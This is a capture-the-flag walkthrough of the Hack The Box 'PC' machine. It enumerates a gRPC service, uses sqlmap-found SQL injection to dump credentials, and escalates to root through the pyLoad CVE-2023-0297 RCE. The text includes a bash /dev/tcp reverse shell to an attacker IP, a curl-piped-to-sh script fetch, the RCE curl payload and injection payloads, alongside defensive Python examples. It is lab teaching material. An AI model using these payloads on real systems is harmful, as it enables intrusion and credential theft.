Hack The Box | PC | Write Up

Hey there, Cyber Warriors! 🚀

Cracking the code, stepping into the mind of the creator, and uncovering secrets no one else has discovered yet — this is the thrill of Capture The Flag (CTF) challenges, and today I’ll take you on a fascinating journey through one of the most compelling tasks in Hack The Box: ‘PC’. This isn’t your typical challenge; ‘PC’ takes you to new heights, pushing you to explore not only the common low ports but also the less-traveled terrain of high ports.

The first step is an Nmap scan to discover which ports and services are running on the target:

sudo nmap -sT -n -Pn -sV -T4 -v 10.10.11.214

The result is unusual: only one open port was found:

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

To gather more information about the machine, we scan again, this time over all TCP ports:

sudo nmap -sT -n -Pn -sV -p- -v 10.10.11.214

Now a second port shows up, 50051:

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
50051/tcp open  unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at <https://nmap.org/cgi-bin/submit.cgi?new-service> :

Searching for information about this port shows that 50051 is the conventional default port for gRPC services.

What is gRPC?

gRPC (Google Remote Procedure Call) is an open-source, high-performance RPC (Remote Procedure Call) framework developed by Google. It can run in any environment and allows communication between services in a variety of ways. Its use of HTTP/2 for transport and Protocol Buffers for message serialization allows fast, efficient communication between client and server.
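As an added example (not part of the original write-up), the following Python decodes the bytes nmap captured in the fingerprint above and parses them as HTTP/2 frames: a server that answers an empty probe with a SETTINGS frame on stream 0 followed by a WINDOW_UPDATE is speaking HTTP/2, the transport gRPC runs on, which is why an unrecognised service on 50051 is worth treating as gRPC. Only the fingerprint bytes come from the page; the frame and setting names come from the HTTP/2 specification and grpc-core.

```python
import re
import struct

# Fingerprint text as nmap printed it for the NULL probe (copied from the scan above).
NMAP_FINGERPRINT = (
    r"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\xff\xff\0\x06\0\0\x20\0"
    r"\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0"
)

FRAME_TYPES = {0x4: "SETTINGS", 0x8: "WINDOW_UPDATE"}
SETTINGS_IDS = {
    0x4: "INITIAL_WINDOW_SIZE",
    0x5: "MAX_FRAME_SIZE",
    0x6: "MAX_HEADER_LIST_SIZE",
    0xFE03: "GRPC_ALLOW_TRUE_BINARY_METADATA",  # experimental id used by grpc-core
}


def nmap_unescape(text: str) -> bytes:
    """Turn nmap's service-fingerprint escaping back into raw bytes.

    nmap writes NUL as \\0, other non-printables as \\xHH and puts a backslash
    in front of regex metacharacters (here '?'); everything else is literal.
    """
    out = bytearray()
    for m in re.finditer(r"\\x([0-9a-fA-F]{2})|\\0|\\(.)|(.)", text, re.S):
        if m.group(1) is not None:
            out.append(int(m.group(1), 16))
        elif m.group(0) == r"\0":
            out.append(0)
        elif m.group(2) is not None:
            out.append(ord(m.group(2)))
        else:
            out.append(ord(m.group(3)))
    return bytes(out)


def parse_h2_frames(data: bytes) -> list:
    """Split bytes into HTTP/2 frames (9-byte header: 24-bit length, type, flags,
    31-bit stream id) and decode the two types a server sends unprompted."""
    frames, pos = [], 0
    while pos + 9 <= len(data):
        length = int.from_bytes(data[pos:pos + 3], "big")
        ftype, flags = data[pos + 3], data[pos + 4]
        stream_id = int.from_bytes(data[pos + 5:pos + 9], "big") & 0x7FFFFFFF
        payload = data[pos + 9:pos + 9 + length]
        if len(payload) != length:
            raise ValueError("truncated frame")
        frame = {"type": FRAME_TYPES.get(ftype, f"0x{ftype:x}"),
                 "flags": flags, "stream": stream_id}
        if ftype == 0x4:  # SETTINGS: sequence of (16-bit id, 32-bit value)
            frame["settings"] = {SETTINGS_IDS.get(sid, f"0x{sid:x}"): val
                                 for sid, val in struct.iter_unpack(">HI", payload)}
        elif ftype == 0x8:  # WINDOW_UPDATE: one 31-bit increment
            frame["increment"] = int.from_bytes(payload, "big") & 0x7FFFFFFF
        frames.append(frame)
        pos += 9 + length
    return frames


def looks_like_h2_server(frames: list) -> bool:
    """An HTTP/2 server's first frame on a connection must be SETTINGS on stream 0."""
    return bool(frames) and frames[0]["type"] == "SETTINGS" and frames[0]["stream"] == 0


if __name__ == "__main__":
    for frame in parse_h2_frames(nmap_unescape(NMAP_FINGERPRINT)):
        print(frame)
```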

After searching for more information about how to interact with this service, I found this article by Microsoft:

https://learn.microsoft.com/en-us/aspnet/core/grpc/test-tools?view=aspnetcore-7.0

The article shows several tools for interacting with a gRPC service. In my case I selected “grpcurl”. More information is available on GitHub (https://github.com/fullstorydev/grpcurl), and the tool can be downloaded for Kali Linux from the releases page:

https://github.com/fullstorydev/grpcurl/releases

Let’s try to discover more information with grpcurl:

./grpcurl 10.10.11.214:50051 describe
Failed to dial target host "10.10.11.214:50051": tls: first record does not look like a TLS handshake

The server is not speaking TLS, so we need to force a plaintext connection with grpcurl:

./grpcurl -plaintext 10.10.11.214:50051 describe
SimpleApp is a service:
service SimpleApp {
  rpc LoginUser ( .LoginUserRequest ) returns ( .LoginUserResponse );
  rpc RegisterUser ( .RegisterUserRequest ) returns ( .RegisterUserResponse );
  rpc getInfo ( .getInfoRequest ) returns ( .getInfoResponse );
}
grpc.reflection.v1alpha.ServerReflection is a service:
service ServerReflection {
  rpc ServerReflectionInfo ( stream .grpc.reflection.v1alpha.ServerReflectionRequest ) returns ( stream .grpc.reflection.v1alpha.ServerReflectionResponse );
}

Server reflection is enabled, so grpcurl can list the services: the server exposes an application named “SimpleApp” with three methods. Next we describe each request message to see which fields each method expects:

  • LoginUser: logs into the application with “username” and “password” parameters.
./grpcurl -plaintext 10.10.11.214:50051 describe LoginUserRequest
LoginUserRequest is a message:
message LoginUserRequest {
  string username = 1;
  string password = 2;
}
  • RegisterUser: registers a new user in the application with “username” and “password” parameters.
./grpcurl -plaintext 10.10.11.214:50051 describe RegisterUserRequest
RegisterUserRequest is a message:
message RegisterUserRequest {
  string username = 1;
  string password = 2;
}
  • getInfo: retrieves information about a user by its “id” parameter.
./grpcurl -plaintext 10.10.11.214:50051 describe getInfoRequest
getInfoRequest is a message:
message getInfoRequest {
  string id = 1;
}

At this point we can call the “getInfo” method with an example “id” to learn more:

./grpcurl -d '{"id":"1"}' -plaintext 10.10.11.214:50051 SimpleApp/getInfo

The application returns an error: a “token” header is required, so we need an authentication token:

{
  "message": "Authorization Error.Missing 'token' header"
}

Let's try to create a new user, which may allow us to log in and then look up information about other users:

./grpcurl -d '{"username":"example", "password":"example"}' -vv -plaintext 10.10.11.214:50051 SimpleApp/RegisterUser
Resolved method descriptor:
rpc RegisterUser ( .RegisterUserRequest ) returns ( .RegisterUserResponse );

Request metadata to send:
(empty)

Response headers received:
content-type: application/grpc
grpc-accept-encoding: identity, deflate, gzip

Estimated response size: 35 bytes

Response contents:
{
  "message": "Account created for user example!"
}

Response trailers received:
(empty)
Sent 1 request and received 1 response

After creating the user, we log in with it:

./grpcurl -d '{"username":"example", "password":"example"}' -vv -plaintext 10.10.11.214:50051 SimpleApp/LoginUser

The login succeeds, and the response trailers carry the important piece: the token we need for the “getInfo” method:

Resolved method descriptor:
rpc LoginUser ( .LoginUserRequest ) returns ( .LoginUserResponse );

Request metadata to send:
(empty)

Response headers received:
content-type: application/grpc
grpc-accept-encoding: identity, deflate, gzip

Estimated response size: 17 bytes

Response contents:
{
  "message": "Your id is 706."
}

Response trailers received:
token: b'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiZXhhbXBsZSIsImV4cCI6MTY4NTcxMjYxOX0.PLDt1weY4ozJzlgZ_sngkh0hAWhqZ9K0ufeXNOA8rVg'
Sent 1 request and received 1 response
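As an added example (not from the write-up), this Python decodes the token returned in the trailers above. The b'...' wrapper is a Python bytes repr leaking from the server; the value inside is a JWT whose first two segments can be read without the signing secret, which tells us the algorithm, the identity it asserts and its expiry. Nothing here verifies the signature; only the server holding the HS256 secret can do that.

```python
import base64
import json

# Token exactly as it appeared in the LoginUser response trailers above.
TOKEN = ("eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9."
         "eyJ1c2VyX2lkIjoiZXhhbXBsZSIsImV4cCI6MTY4NTcxMjYxOX0."
         "PLDt1weY4ozJzlgZ_sngkh0hAWhqZ9K0ufeXNOA8rVg")


def b64url_decode(segment: str) -> bytes:
    """JWT segments are base64url without padding; restore it before decoding."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def inspect_jwt(token: str) -> dict:
    """Return header, claims and signature length of a compact JWS token
    WITHOUT verifying the signature (inspection only)."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("not a compact JWS (expected 3 dot-separated parts)")
    return {
        "header": json.loads(b64url_decode(parts[0])),
        "claims": json.loads(b64url_decode(parts[1])),
        "signature_len": len(b64url_decode(parts[2])),  # 32 bytes for HS256
    }


def is_expired(claims: dict, now: int) -> bool:
    """exp is a Unix timestamp (RFC 7519 section 4.1.4); no exp means never expires."""
    return "exp" in claims and now >= int(claims["exp"])


if __name__ == "__main__":
    info = inspect_jwt(TOKEN)
    print(info["header"])
    print(info["claims"], "expired at 1685712619:", is_expired(info["claims"], 1685712619))
```

Note that the claim names the user as "example" while getInfo is keyed by a separate numeric id, so a valid token by itself says nothing about which records it may read.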

Now we can call the “getInfo” method with the token in the header:

./grpcurl -d '{"id":"706"}' -H 'token:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiZXhhbXBsZSIsImV4cCI6MTY4NTcxMjYxOX0.PLDt1weY4ozJzlgZ_sngkh0hAWhqZ9K0ufeXNOA8rVg' -vv -plaintext 10.10.11.214:50051 SimpleApp/getInfo

This time the request is authorized, but the response for our own id is only a placeholder message:

Resolved method descriptor:
rpc getInfo ( .getInfoRequest ) returns ( .getInfoResponse );

Request metadata to send:
token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiZXhhbXBsZSIsImV4cCI6MTY4NTcxMjYxOX0.PLDt1weY4ozJzlgZ_sngkh0hAWhqZ9K0ufeXNOA8rVg

Response headers received:
content-type: application/grpc
grpc-accept-encoding: identity, deflate, gzip

Estimated response size: 19 bytes

Response contents:
{
  "message": "Will update soon."
}

Response trailers received:
(empty)
Sent 1 request and received 1 response

But if we query id 1 with the same token, we get a different message, so the “id” parameter is not restricted to our own user:

./grpcurl -d '{"id":"1"}' -H 'token:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiZXhhbXBsZSIsImV4cCI6MTY4NTcxMjYxOX0.PLDt1weY4ozJzlgZ_sngkh0hAWhqZ9K0ufeXNOA8rVg' -plaintext 10.10.11.214:50051 SimpleApp/getInfo
{
  "message": "The admin is working hard to fix the issues."
}

At this point we switch to another tool, “grpcui”, which provides a web user interface for interacting with gRPC services. It can be downloaded from GitHub (https://github.com/fullstorydev/grpcui/releases). After downloading it, we start a session against the service:

./grpcui -plaintext 10.10.11.214:50051

After running the command, the grpcui web interface opens for interacting with the gRPC service. The next step is to capture the “getInfo” request so we can modify it and test for injection:

Once the request is filled in, the next step is to route it through Burp Suite with the browser extension “FoxyProxy”. Before using it, the proxy has to be configured in the extension settings:

Now the request is in Burp Suite and we will test it for SQL injection. Why? Because research on this type of service shows it is commonly vulnerable to SQL injection:

We send the request to “Repeater” and save it to a file:

The request is now saved:

Now we run sqlmap against the saved request to look for SQL injection:

sudo sqlmap -r pc.req

sqlmap reports that the application is vulnerable to SQL injection through the “id” parameter, and identifies the backend as SQLite:

Parameter: JSON id ((custom) POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: {"metadata":[{"name":"token","value":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiZXhhbXBsZSIsImV4cCI6MTY4NTcxMjYxOX0.PLDt1weY4ozJzlgZ_sngkh0hAWhqZ9K0ufeXNOA8rVg"}],"data":[{"id":"1 AND 8736=8736"}]}

    Type: time-based blind
    Title: SQLite > 2.0 AND time-based blind (heavy query)
    Payload: {"metadata":[{"name":"token","value":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiZXhhbXBsZSIsImV4cCI6MTY4NTcxMjYxOX0.PLDt1weY4ozJzlgZ_sngkh0hAWhqZ9K0ufeXNOA8rVg"}],"data":[{"id":"1 AND 4960=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2))))"}]}

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: {"metadata":[{"name":"token","value":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiZXhhbXBsZSIsImV4cCI6MTY4NTcxMjYxOX0.PLDt1weY4ozJzlgZ_sngkh0hAWhqZ9K0ufeXNOA8rVg"}],"data":[{"id":"-4905 UNION ALL SELECT CHAR(113,122,122,113,113)||CHAR(81,101,109,108,117,118,88,107,120,77,88,108,82,76,75,89,112,66,109,71,83,74,119,104,100,110,110,74,74,77,78,122,78,86,122,80,111,81,104,105)||CHAR(113,98,98,106,113)-- hDmD"}]}
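As an added example (not code from the original box), the following Python puts the pattern behind sqlmap's boolean-based finding next to a hardened handler. The schema and rows are constructed for the demo; only the table name reported by sqlmap (messages), the getInfo ids and messages seen above, and the payload come from the write-up. The hardened form binds the id as a parameter and also scopes the lookup to the user named in the token, closing both the injection and the ability of any valid token to read id 1.

```python
import sqlite3

# Constructed schema: the real database only revealed its table names through
# sqlmap; the columns and rows here are invented so both handlers have data.
SCHEMA = """
CREATE TABLE messages (id INTEGER, username TEXT, message TEXT);
INSERT INTO messages VALUES (1, 'admin', 'The admin is working hard to fix the issues.');
INSERT INTO messages VALUES (706, 'example', 'Will update soon.');
"""


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def get_info_vulnerable(conn: sqlite3.Connection, user_id: str):
    """The weak pattern: the client-controlled id is spliced into the SQL text,
    so a value like '1 AND 8736=8736' is parsed as SQL rather than compared as
    a number. This is exactly what sqlmap's boolean-based test exercises."""
    row = conn.execute(
        f"SELECT message FROM messages WHERE id = {user_id}").fetchone()
    return row[0] if row else None


def parse_id(value: str):
    """Accept only a plain decimal id; anything else is rejected before it
    gets near the database. Returns None for rejected input."""
    return int(value) if value.isdigit() else None


def get_info_safe(conn: sqlite3.Connection, user_id: str, token_user: str):
    """Hardened form: the id is validated and bound as a parameter, and the
    lookup is scoped to the user named in the (already verified) token, so a
    token for 'example' cannot read the row stored under id 1."""
    record_id = parse_id(user_id)
    if record_id is None:
        return None
    row = conn.execute(
        "SELECT message FROM messages WHERE id = ? AND username = ?",
        (record_id, token_user)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    for payload in ("706", "1", "1 AND 8736=8736", "1 AND 8736=8737"):
        print(repr(payload), "-> vulnerable:", get_info_vulnerable(db, payload),
              "| hardened:", get_info_safe(db, payload, "example"))
```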

Knowing the application is vulnerable, we enumerate the tables of the database:

sudo sqlmap -r pc.req --dbms SQLite --tables

Two tables are returned:

[13:16:57] [INFO] fetching tables for database: 'SQLite_masterdb'
<current>
[2 tables]
+----------+
| accounts |
| messages |
+----------+

The “accounts” table looks promising; we dump it with sqlmap too:

sudo sqlmap -r pc.req --dbms SQLite -T accounts --dump

It contains a username and password we can try over SSH:

Database: <current>
Table: accounts
[2 entries]
+------------------------+----------+
| password               | username |
+------------------------+----------+
| admin                  | admin    |
| REPLACED               | REPLACED |
+------------------------+----------+

Now we check whether the discovered credentials work over SSH:

└─$ ssh sau@10.10.11.214

Finally, we can reach the user flag:

Next we enumerate the machine with LinPEAS. First we start an HTTP server on our attacking host to serve the script:

sudo python3 -m http.server 80

Then we fetch and run linpeas directly from the pipe, without writing the script to disk, logging the output:

curl http://10.10.16.64/linpeas.sh | sh >> linpeas.log

Among the processes running on the server, two stand out: a Python application at /opt/app/app.py (the gRPC service) and pyload, both running as root:

╔══════════╣ Cleaned processes
╚ Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes
root         486  0.0  0.0   2488   512 ?        S    05:36   0:00  _ bpfilter_umh
root           1  0.0  0.2 167996 11532 ?        Ss   05:36   0:02 /sbin/init
root         464  0.3  2.0 163632 80964 ?        S<s  05:36   0:25 /lib/systemd/systemd-journald
root         514  0.0  0.1  20176  5864 ?        Ss   05:36   0:00 /lib/systemd/systemd-udevd
systemd+     534  0.0  0.1  19080  7608 ?        Ss   05:36   0:00 /lib/systemd/systemd-networkd
  └─(Caps) 0x0000000000003c00=cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw
root         679  0.0  0.4 280192 18004 ?        SLsl 05:36   0:00 /sbin/multipathd -d -s
root         707  0.0  0.0  11356  1680 ?        S<sl 05:36   0:00 /sbin/auditd
root         738  0.0  0.2  49296 10444 ?        Ss   05:36   0:00 /usr/bin/VGAuthService
root         739  0.1  0.2 239496  8092 ?        Ssl  05:36   0:10 /usr/bin/vmtoolsd
root         770  0.0  0.1  99900  5980 ?        Ssl  05:36   0:00 /sbin/dhclient -1 -4 -v -i -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases -I -df /var/lib/dhcp/dhclient6.eth0.leases eth0
root         819  0.0  0.2 241052  9180 ?        Ssl  05:36   0:03 /usr/lib/accountsservice/accounts-daemon
message+     820  0.0  0.1   7572  4436 ?        Ss   05:36   0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  └─(Caps) 0x0000000020000000=cap_audit_write
root         833  0.0  0.0  81956  3648 ?        Ssl  05:36   0:00 /usr/sbin/irqbalance --foreground
root         834  0.0  0.4  29876 18312 ?        Ss   05:36   0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
root         835  0.0  0.2 236440  9040 ?        Ssl  05:36   0:00 /usr/lib/policykit-1/polkitd --no-debug
syslog       836  0.2  0.1 224344  5352 ?        Ssl  05:36   0:16 /usr/sbin/rsyslogd -n -iNONE
root         838  0.0  1.0 875264 41940 ?        Ssl  05:36   0:01 /usr/lib/snapd/snapd
root         839  0.0  0.1  17492  7760 ?        Ss   05:36   0:00 /lib/systemd/systemd-logind
root         841  0.0  0.3 395492 13836 ?        Ssl  05:36   0:00 /usr/lib/udisks2/udisksd
root         886  0.0  0.3 318824 13412 ?        Ssl  05:36   0:00 /usr/sbin/ModemManager
root        1054  0.4  0.7 634840 31420 ?        Ssl  05:36   0:35 /usr/bin/python3 /opt/app/app.py
root        1060  0.0  1.5 1221072 62468 ?       Ssl  05:36   0:06 /usr/bin/python3 /usr/local/bin/pyload
root        1073  0.0  0.0   8540  2940 ?        Ss   05:36   0:00 /usr/sbin/cron -f
daemon      1077  0.0  0.0   3796  2276 ?        Ss   05:36   0:00 /usr/sbin/atd -f
root        1082  0.0  0.0   5828  1984 tty1     Ss+  05:36   0:00 /sbin/agetty -o -p -- u --noclear tty1 linux
sau         1714  0.0  0.1  13960  6088 ?        S    06:11   0:00  |   _ sshd: sau@pts/1
sau         1715  0.0  0.1   9988  5012 pts/1    Ss+  06:11   0:00  |       _ -bash
sau         2196  0.0  0.1  13964  5304 ?        S    07:39   0:00      _ sshd: sau@pts/0
sau         2197  0.0  0.1   9988  4936 pts/0    Ss   07:39   0:00          _ -bash
sau         2224  0.0  0.2  26536 10856 pts/0    S+   07:45   0:00              _ curl http://10.10.16.64/linpeas.sh
sau         2225  0.4  0.0   3532  2728 pts/0    S+   07:45   0:00              _ sh
sau         5451  0.0  0.0   3532  1020 pts/0    S+   07:46   0:00                  _ sh
sau         5455  0.0  0.0  10952  3616 pts/0    R+   07:46   0:00                  |   _ ps fauxwww
sau         5454  0.0  0.0   3532  1020 pts/0    S+   07:46   0:00                  _ sh
systemd+    1279  0.0  0.3  24448 12172 ?        Ss   05:42   0:00 /lib/systemd/systemd-resolved
sau         1356  0.0  0.2  19104  9844 ?        Ss   05:43   0:00 /lib/systemd/systemd --user
sau         1359  0.0  0.0 169352  3388 ?        S    05:43   0:00  _ (sd-pam)
sau         5342  0.0  0.1   7108  4088 ?        Ss   07:45   0:00  _ /usr/bin/dbus-daemon --session --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only

LinPEAS also lists the listening ports. Port 8000 is bound to 127.0.0.1 only, which is why it was not visible from outside:

╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp        0      0 127.0.0.1:8000          0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:9666            0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp6       0      0 :::50051                :::*                    LISTEN      -
tcp6       0      0 :::22                   :::*                    LISTEN      -

Next we query port 8000 from the box itself to see what kind of service is running there:

sau@pc:~$ curl http://127.0.0.1:8000

It is a web application, and it redirects us to a login URL:

<!doctype html>
<html lang=en>
<title>Redirecting...</title>
<h1>Redirecting...</h1>
<p>You should be redirected automatically to the target URL: <a href="/login?next=http%3A%2F%2F127.0.0.1%3A8000%2F">/login?next=http%3A%2F%2F127.0.0.1%3A8000%2F</a>. If not, click the link.

Following the redirect:

sau@pc:~$ curl http://127.0.0.1:8000/login

It is the PyLoad login page. Searching for known issues in this service turns up this write-up of a pre-authentication RCE (CVE-2023-0297):

https://github.com/bAuh0lz/CVE-2023-0297_Pre-auth_RCE_in_pyLoad

along with a proof-of-concept request:

sau@pc:~$ curl -i -s -k -X $'POST' \
    --data-binary $'jk=pyimport%20os;os.system(\"touch%20/tmp/pwnd\");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' \
    $'http://<target>/flash/addcrypted2'

We will use this exploit to obtain a reverse shell. https://www.revshells.com provides ready-made templates; I selected this one:

#!/bin/bash
/bin/bash -i >& /dev/tcp/10.10.16.64/9000 0>&1

Save it as /tmp/rv.sh on the target and add execution permission:

sau@pc:~$ chmod +x rv.sh

After creating the reverse shell script, we start a netcat listener on the attacking host:

sudo nc -nlvp 9000

Now we modify the exploit payload to run our script. Since port 8000 only listens on localhost, the request is sent from the SSH session:

sau@pc:~$ curl -i -s -k -X $'POST' \
    --data-binary $'jk=pyimport%20os;os.system(\"bash%20/tmp/rv.sh\");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' \
    $'http://localhost:8000/flash/addcrypted2'

Finally, because pyload runs as root, the connection comes back with root privileges:

The last step is to read the root flag!

In closing, I would like to emphasize that the realm of cyber security is a constantly evolving landscape. As we venture through this dynamic world, it’s important to continue learning and adapting. Each Capture The Flag challenge, each line of code, each high port we encounter serves as a reminder that there’s always more to learn.

Remember, enumeration isn’t just about counting; it’s about understanding, getting into the minutiae of systems, and revealing hidden vulnerabilities. It’s through meticulous probing and exploration that we truly get to the heart of the system. Injections aren’t merely exploits, but valuable lessons in recognizing and mitigating risks.

In our journey to secure cyberspace, it’s our curiosity and persistence that drive us forward. It’s about asking the right questions, cracking the code, and leaving no stone unturned. As we step into tomorrow, let’s continue to challenge assumptions, elevate our knowledge, and shape the future of cyber security.

Remember, the greatest weapon in the world of cyber security is knowledge. Stay curious, stay vigilant, and most importantly, never stop learning.
